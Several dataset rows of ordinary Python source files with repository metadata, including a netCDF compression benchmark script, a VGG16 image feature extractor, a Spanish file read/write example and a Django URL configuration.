print("debug: In nj loop %d\n" % (nj))
ni = 0
nj += 1
print("== End of lon transformation \n")
new_dataset.variables['lon'][:] = n_data
new_dataset.sync()
new_dataset.close()
old_dataset.sync()
old_dataset.close()
print("================== End of transforming netCDF coordinates ==================")
def compress_original_files(original_filename):
""" compress the output file and gets its compressed size """
print("== Compress original file %s \n" %(original_filename))
new_data_set = original_filename
# get data_set uncompressed size
size = os.path.getsize(new_data_set)
sevenzip_script = "/homespace/gaubert/ecli-workspace/rodd/etc/compression/7zip_compression.sh"
func = subprocess.call
res = [ ]
time_7zip = ftimer(func,[ [ sevenzip_script, new_data_set, "%s.7z" % (new_data_set) ] ], {}, res,number=1)
print("\nTime: %s secs \n 7zip file %s\n"%(time_7zip , new_data_set))
if res[0] != 0:
print("Error. Cannot 7zip file %s" % (new_data_set))
size_7zip = os.path.getsize("%s.7z" %(new_data_set))
"""bzip2_script = "/homespace/gaubert/ecli-workspace/rodd/etc/compression/bzip2_compression.sh"
func = subprocess.call
res = []
time_bzip2 = ftimer(func,[[bzip2_script, new_data_set, "%s.bz2" % (new_data_set) ] ], {}, res, number=1)
print("\nTime: %s secs \n bzip2 file %s\n"%(time_bzip2 , new_data_set))
if res[0] != 0:
print("Error. Cannot bzip2 file %s" % (new_data_set))
size_bzip2 = os.path.getsize("%s.bz2" %(new_data_set))
"""
szip_script = "/homespace/gaubert/ecli-workspace/rodd/etc/compression/szip_compression.sh"
time_szip = ftimer(func,[ [ szip_script, new_data_set, "%s.sz" % (new_data_set) ] ], {}, res,number=1)
print("\nTime: %s secs \n szip file %s\n" % (time_szip , new_data_set))
if res[0] != 0:
print("Error. Cannot bzip2 file %s" % (new_data_set))
size_szip = os.path.getsize("%s.sz" %(new_data_set))
print("7zip size %d. szip size %d" % (size_7zip, size_szip))
#return [( round(float(size)/float(size_bzip2), 2), size_bzip2, time_bzip2 ),( round(float(size)/float(size_szip), 2), size_szip, time_szip )]
return {
'name' : os.path.basename(original_filename),
'size' : size,
'orig 7z size' : size_7zip,
'orig 7z ratio': round(float(size)/float(size_7zip), 2),
'orig 7z compression time' : round(time_7zip,2),
'orig sz size' : size_szip,
'orig sz ratio' : round(float(size)/float(size_szip), 2),
'orig sz compression time' : round(time_szip,2)
}
def compress_files(original_filename, new_data_set, digits):
""" compress the output file and gets its compressed size """
print("== Start Compression tests for %s \n" %(new_data_set))
# get data_set uncompressed size
size = os.path.getsize(new_data_set)
bzip2_script = "/homespace/gaubert/ecli-workspace/rodd/etc/compression/bzip2_compression.sh"
func = subprocess.call
res = []
sevenzip_script = "/homespace/gaubert/ecli-workspace/rodd/etc/compression/7zip_compression.sh"
func = subprocess.call
res = []
time_7zip = ftimer(func,[ [sevenzip_script, new_data_set, "%s.7z" % (new_data_set) ] ], {}, res, number=1)
print("\nTime: %s secs \n 7zip file %s\n"%(time_7zip , new_data_set))
if res[0] != 0:
print("Error. Cannot 7zip file %s" % (new_data_set))
size_7zip = os.path.getsize("%s.7z" %(new_data_set))
"""
time_bzip2 = ftimer(func,[[bzip2_script, new_data_set, "%s.bz2" % (new_data_set) ] ], {}, res, number=1)
print("\nTime: %s secs \n bzip2 file %s\n"%(time_bzip2 , new_data_set))
if res[0] != 0:
print("Error. Cannot bzip2 file %s" % (new_data_set))
size_bzip2 = os.path.getsize("%s.bz2" %(new_data_set))
"""
szip_script = "/homespace/gaubert/ecli-workspace/rodd/etc/compression/szip_compression.sh"
time_szip = ftimer(func,[ [ szip_script, new_data_set, "%s.sz" % (new_data_set) ] ], {}, res,number=1)
print("\nTime: %s secs \n szip file %s\n" % (time_szip , new_data_set))
if res[0] != 0:
print("Error. Cannot bzip2 file %s" % (new_data_set))
size_szip = os.path.getsize("%s.sz" %(new_data_set))
print("7zip size %d. szip size %d" % (size_7zip, size_szip))
#return [( round(float(size)/float(size_bzip2), 2), size_bzip2, time_bzip2 ),( round(float(size)/float(size_szip), 2), size_szip, time_szip )]
return {
'name' : os.path.basename(original_filename),
'size' : size,
'%d d 7z size' % (digits) : size_7zip,
'%d d 7z ratio' % (digits): round(float(size)/float(size_7zip), 2),
'%d d 7z compression time' % (digits) : round(time_7zip,2),
#'%d d bz2 size' % (digits) : size_bzip2,
#'%d d bz2 ratio' % (digits) : round(float(size)/float(size_bzip2), 2),
#'%d d bz2 compression time' % (digits) : round(time_bzip2,2),
'%d d sz size' % (digits) : size_szip,
'%d d sz ratio' % (digits) : round(float(size)/float(size_szip), 2),
'%d d sz compression time' % (digits): round(time_szip,2)
}
def run_unitary_test(filename, temp_root_dir, to_clean, version, transform = True):
""" run 2 digits and 3 digits precisons test for each files """
bunzip2_script = "/homespace/gaubert/ecli-workspace/rodd/etc/compression/bunzip2.sh"
tempdir = tempfile.mkdtemp(dir=temp_root_dir)
output_download_file = '%s/%s' % (tempdir, filename)
download_file(SERVER, DIRECTORY, filename, output_download_file)
if output_download_file.endswith('.bz2'):
res = subprocess.call([bunzip2_script, output_download_file])
if res != 0:
raise Exception("Error while uncompressing %s\n" % (output_download_file) )
else:
output_download_file = output_download_file[:-4]
d1 = {}
d2 = {}
d3 = {}
d4 = {}
if transform:
output_file = generate_template_from_src(tempdir, output_download_file,'new-file.nc', version)
#test with 3 digits
digits = 3
transform_osi_saf_netcdf(output_download_file, output_file, digits)
d2 = compress_files(output_download_file, output_file, digits)
d4 = compress_original_files(output_download_file)
# clean temp dir
if to_clean:
eumetsat.common.utils.delete_all_under(tempdir, True)
return dict(d1.items() + d2.items() + d3.items() + d4.items())
def run_full_tests(version = 3, result_file_name = '/tmp/result-nc3.csv', nb_runs = 50, transform = True):
""" run the complete tests """
TO_CLEAN = False
#ROOT_TEMP_DIR = "/homespace/gaubert/tempo"
ROOT_TEMP_DIR = "/tmp/comp-tempo"
if TO_CLEAN:
#clean root dir
eumetsat.common.utils.delete_all_under(ROOT_TEMP_DIR)
#create csv file
digits = 3
fieldnames = ['%d d 7z size' % (digits) , '%d d 7z ratio' % (digits) , '%d d 7z compression time' % (digits) , '%d d sz size' % (digits) , '%d d sz ratio' % (digits) , '%d d sz compression time' % (digits)]
# add filednames for original filenames
fieldnames.extend(['orig 7z size', 'orig 7z ratio', 'orig 7z compression time', 'orig sz size', 'orig sz ratio', 'orig sz compression time'])
# add filename and initial size
fieldnames.extend([ 'name', 'size' ])
# add filednames for original filenames
fieldnames.extend(['orig 7z size', 'orig 7z ratio', 'orig 7z compression time', 'orig sz size', 'orig sz ratio', 'orig sz compression time'])
result_file = open(result_file_name, 'wb')
writer = csv.DictWriter(result_file, fieldnames=fieldnames)
headers = dict( (n,n) for n in fieldnames )
writer.writerow(headers)
result_file.flush()
#result_file.close()
list_of_files = list_ftp_dir(SERVER, DIRECTORY, FILES)
icpt = 0
for (i,the_file) in enumerate(list_of_files):
print("####################### Run %d #######################\n" % (i))
try:
result_row = run_unitary_test(the_file, ROOT_TEMP_DIR, TO_CLEAN, version, transform)
# comment creation of results in csv file
print("result_row = %s\n" %(result_row))
writer.writerow(result_row)
result_file.flush()
icpt+=1
if icpt == nb_runs:
break
except Exception, e:
print(eumetsat.common.utils.get_exception_traceback())
if __name__ == '__main__':
version = 3
result_file_name = '/tmp/result-nc-round-3d-7z.csv'
nb_runs = 60
transform = True
run_full_tests(version, result_file_name, nb_runs, transform)
#version = 4
#result_file_name = '/tmp/result-nc4.csv'
#nb_runs = 50
#run_full_tests(version, result_file_name, nb_runs)
|
[
"guillaume.aubert@gmail.com"
] |
guillaume.aubert@gmail.com
|
e6b5006446aa5630b3cd4c2cb01fd78aa200d0ba
|
008ea2e16bc919465579210792d221e465d59660
|
/extract_features.py
|
21d10dad2f79acf63306c1f343ea9d477a0e9acd
|
[
"MIT"
] |
permissive
|
AdamSpannbauer/wedding_ring_detector
|
d0e1883b9c204a6cfbf439d3bf798cb7d45cfd02
|
eb59acbb70f513711657b6f1b04abbf2ca271319
|
refs/heads/master
| 2020-08-24T16:27:46.263977
| 2019-10-23T21:33:55
| 2019-10-23T21:33:55
| 216,863,821
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,921
|
py
|
"""Extract features from training images to hd5f db
Modified from:
https://gurus.pyimagesearch.com/topic/transfer-learning-example-dogs-and-cats/
"""
import cv2
import numpy as np
from keras.applications import VGG16
from keras.applications import imagenet_utils
class FeatureExtractor:
"""Wrapper to extract features from images with pre-trained VGG16
:param batch_size: number of images to extract features from at once
:ivar batch_size: see param batch_size
:ivar model: pre-trained VGG16 from keras.applications
"""
def __init__(self, batch_size=1):
self.model = VGG16(weights='imagenet', include_top=False)
self.batch_size = batch_size
@staticmethod
def preprocess_cv2_image(cv2_image_bgr):
"""Prepare an OpenCV BGR image for keras.applications.VGG16(weights='imagenet')
:param cv2_image_bgr: OpenCV style BGR image
:return: image with attributes prepared for keras VGG16 imagenet model
"""
cv2_image_bgr = cv2.resize(cv2_image_bgr, (224, 224))
cv2_image_rgb = cv2.cvtColor(cv2_image_bgr, cv2.COLOR_BGR2RGB).astype('float')
image_4d = np.expand_dims(cv2_image_rgb, axis=0)
preprocessed_image = imagenet_utils.preprocess_input(image_4d)
return preprocessed_image
def extract_features(self, images, batch_size=None):
"""Extract features from batch of prepped images
:param images: Array of images prepped for keras.applications.VGG16(weights='imagenet')
:param batch_size: Number of images to extract features from at once
:return: Array of features extracted by keras VGG16 imagenet model
"""
if batch_size is None:
batch_size = self.batch_size
features = self.model.predict(images, batch_size=batch_size)
return features.reshape((features.shape[0], 512 * 7 * 7))
def extract_features_cv2(self, cv2_image_bgr):
"""Extract VGG16 imagenet features from single OpenCV BGR image
:param cv2_image_bgr: OpenCV BGR image
:return: Array of features extracted by keras VGG16 imagenet model
"""
preprocessed_image = self.preprocess_cv2_image(cv2_image_bgr)
features = self.extract_features(preprocessed_image, batch_size=1)
return features.reshape((features.shape[0], 512 * 7 * 7))
if __name__ == '__main__':
import argparse
import random
import os
from tqdm import tqdm
import imutils.paths
from sklearn.preprocessing import LabelEncoder
from hdf5_dataset_writer import HDF5DatasetWriter
random.seed(42)
CLASS_LABELS = {
'gather_married': 'married',
'gather_non_married': 'not_married',
}
ap = argparse.ArgumentParser()
ap.add_argument('-d', '--dataset', default='images',
help='path to input dataset')
ap.add_argument('-o', '--output', default='features.hdf5',
help='path to output HDF5 file')
ap.add_argument('-b', '--batch_size', type=int, default=32,
help='batch size of images to be passed through network')
ap.add_argument('-s', '--buffer_size', type=int, default=1000,
help='size of feature extraction buffer')
args = vars(ap.parse_args())
all_image_paths = list(imutils.paths.list_images(args['dataset']))
random.shuffle(all_image_paths)
class_labels = []
image_paths = []
for image_path in tqdm(all_image_paths, desc='Filtering images'):
dir_label = image_path.split(os.path.sep)[-2]
try:
class_label = CLASS_LABELS[dir_label]
except KeyError:
continue
class_labels.append(class_label)
image_paths.append(image_path)
label_encoder = LabelEncoder()
labels = label_encoder.fit_transform(class_labels)
feature_extractor = FeatureExtractor(batch_size=args['batch_size'])
dataset = HDF5DatasetWriter((len(image_paths), 512 * 7 * 7),
args['output'],
data_key='features',
buff_size=args['buffer_size'],
overwrite=True)
dataset.store_class_labels(label_encoder.classes_)
for i in tqdm(range(0, len(image_paths), args['batch_size']), desc='Extracting features'):
batch_paths = image_paths[i:i + args['batch_size']]
batch_labels = labels[i:i + args['batch_size']]
batch_images = []
# Perform batch feature extraction and add to db
for (j, image_path) in enumerate(batch_paths):
image = cv2.imread(image_path)
image = feature_extractor.preprocess_cv2_image(image)
batch_images.append(image)
batch_images = np.vstack(batch_images)
feats = feature_extractor.extract_features(batch_images)
dataset.add(feats, batch_labels)
dataset.close()
|
[
"u775749@emn.com"
] |
u775749@emn.com
|
fbc4485b2e43f3282f9b7e102231bd0608f8f911
|
03ba3c552b9ea608cee992e834d2e2983a867e38
|
/programacion_desde_cero_con_python/manejo_archivos.py
|
0bbad88ffb784e98f80d97c7a37dc0ad96368f74
|
[] |
no_license
|
vpoloromero/Curso-Python
|
e7b387e9b6335f876502d9daf65ead482396f4bf
|
168d3b4d85a3da6ff1dc0d4f7da39a47866bd348
|
refs/heads/master
| 2022-09-12T13:40:46.895694
| 2022-07-27T22:12:47
| 2022-07-27T22:12:47
| 216,206,428
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 526
|
py
|
# -*- coding: utf-8 -*-
"""
@author: Octavio Gutiérrez de Código Máquina
URL del canal: https://www.youtube.com/CodigoMaquina
URL del video: https://youtu.be/bf_698bfPDU
"""
def escribir(nombre, texto):
with open(nombre, "w") as archivo:
archivo.write(texto)
def leer(nombre):
texto=""
with open(nombre, "r") as archivo:
texto = archivo.read()
return texto
if __name__ == "__main__":
escribir("prueba.txt", "Un texto cualquiera")
print(leer("prueba.txt"))
|
[
"noreply@github.com"
] |
vpoloromero.noreply@github.com
|
bb2b6a434a7822094e49e100f57a46df36bca90e
|
57f0685e4d2dee92e57b9a7b948ad40d4f88cff6
|
/modules/Aseguradoras/urls.py
|
f3e74dc269278286ef9b21099248cb918ae5e7d0
|
[] |
no_license
|
richard020797/CARSapi
|
37ff75234f2bb1b8b73f77e19dfeb63f4ec36f62
|
cd116f2828710670a9e94058517fed6af4f12f74
|
refs/heads/master
| 2021-01-12T13:52:31.100950
| 2016-09-27T00:58:12
| 2016-09-27T00:58:12
| 69,070,777
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 220
|
py
|
from django.conf.urls import url
from .views import ListAseguradoras
from .views import DetailAseguradora
urlpatterns = [
url(r'^$', ListAseguradoras.as_view()),
url(r'^(?P<pk>[0-9]+)/$',DetailAseguradora.as_view())
]
|
[
"richard020797@gmail.com"
] |
richard020797@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.